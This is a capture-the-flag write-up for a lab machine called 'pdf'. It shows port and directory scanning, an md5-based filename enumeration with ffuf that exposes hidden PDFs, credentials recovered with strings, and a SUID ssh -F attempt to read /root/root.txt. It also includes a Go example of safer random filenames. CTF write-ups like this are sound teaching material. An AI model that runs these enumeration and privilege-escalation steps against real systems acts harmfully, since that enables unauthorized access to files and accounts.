mazesec pdf

Information Gathering

# Nmap 7.95 scan initiated Tue Dec 16 11:56:36 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p22,80,8080 -sC -sV -oA ./Recon/192.168.110.57 192.168.110.57
Nmap scan report for pdf.lan (192.168.110.57)
Host is up (0.00076s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: The Evolution of PDF Format
8080/tcp open  http    Golang net/http server
|_http-title: File Management System
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.0 200 OK
|     Date: Tue, 16 Dec 2025 11:56:49 GMT
|     Content-Length: 1415
|     Content-Type: text/html; charset=utf-8
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>File Management System</title>
|     <style>
|     body { font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f4; }
|     .container { max-width: 800px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
|     text-align: center; color: #333; }
|     .error { color: red; text-align: center; }
|     .hint { color: #555; text-align: center; font-style: italic; }
|     input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
|     button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
|_    button
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Vulnerability Analysis

http://192.168.110.57/ // view the page source and look at line 338

gobuster dir -u http://192.168.110.57/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hint.txt             (Status: 200) [Size: 44]
/server-status        (Status: 403) [Size: 279]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================

curl http://192.168.110.57/hint.txt ➜ number 42

http://192.168.110.57:8080/ // entering 42 grants access

The filename being looked up turns out to be the MD5 of "1", so we generate MD5(n).pdf for n = 1 to 100:

# build the candidate list: md5 of each decimal id, one name per line
for i in {1..100}; do
	hash=$(echo -n "$i" | md5sum | awk '{print $1}')
	echo "${hash}.pdf" >> payload_list.txt
done
# fuzz the view endpoint with the authenticated session; -fs drops the two "not found" response sizes
ffuf -u http://192.168.110.57:8080/view/\?filename\=FUZZ -w payload_list.txt -b "session_token=42" -fs 1779,1193
# hit: 72b32a1f754ba1c09b3695e0cb6cde7f.pdf [Status: 200, Size: 1219, Words: 108, Lines: 81, Duration: 9ms]
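As an added example, not from the writeup, in Go because the port-8080 service is a Go net/http server: the weak md5(id) naming scheme the box used beside a random-identifier replacement, plus a helper that counts how many stored names a guessed id range recovers. The function names and the in-memory name store are assumptions.

```go
package main

import (
	"crypto/md5"
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"strconv"
)

// WeakName reproduces the scheme the target used: the stored filename is
// md5(decimal id) + ".pdf". The input space is tiny and sequential, so anyone
// holding a valid session can regenerate every name offline, exactly as the
// shell loop above does.
func WeakName(id int) string {
	sum := md5.Sum([]byte(strconv.Itoa(id)))
	return hex.EncodeToString(sum[:]) + ".pdf"
}

// RandomName is the hardened replacement (assumed, not the box's code): 128 bits
// from crypto/rand, unrelated to the record id, so it cannot be enumerated.
func RandomName() (string, error) {
	var b [16]byte
	if _, err := rand.Read(b[:]); err != nil {
		return "", err
	}
	return hex.EncodeToString(b[:]) + ".pdf", nil
}

// Enumerable reports how many of the stored names an attacker could regenerate
// by guessing ids 1..maxID; for a WeakName store that is all of them.
func Enumerable(names map[string]bool, maxID int) int {
	hits := 0
	for id := 1; id <= maxID; id++ {
		if names[WeakName(id)] {
			hits++
		}
	}
	return hits
}

func main() {
	store := map[string]bool{} // constructed sample store of 100 records
	for id := 1; id <= 100; id++ {
		store[WeakName(id)] = true
	}
	fmt.Printf("weak scheme: %d of 100 names recoverable from ids 1..100\n", Enumerable(store, 100))
	n, _ := RandomName()
	fmt.Println("random name:", n)
}
```

Unguessable names only raise the cost of guessing; they are not authorization, so the /view handler still has to check that the session owns the requested file.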

Exploitation

Save the unusual PDF file locally.

strings id_57.pdf yields welcome:lamar57

Privilege Escalation

welcome@pdf:~$ find / -perm -4000 2>/dev/null
/usr/bin/ssh
LFILE=/root/root.txt
ssh -F $LFILE localhost
# Can't read /root/.ssh/id.rsa this way, because everything that comes back is lowercase letters
# Couldn't find a privilege escalation path

Lessons Learned

Was not persistent enough with 72b32a1f754ba1c09b3695e0cb6cde7f.pdf
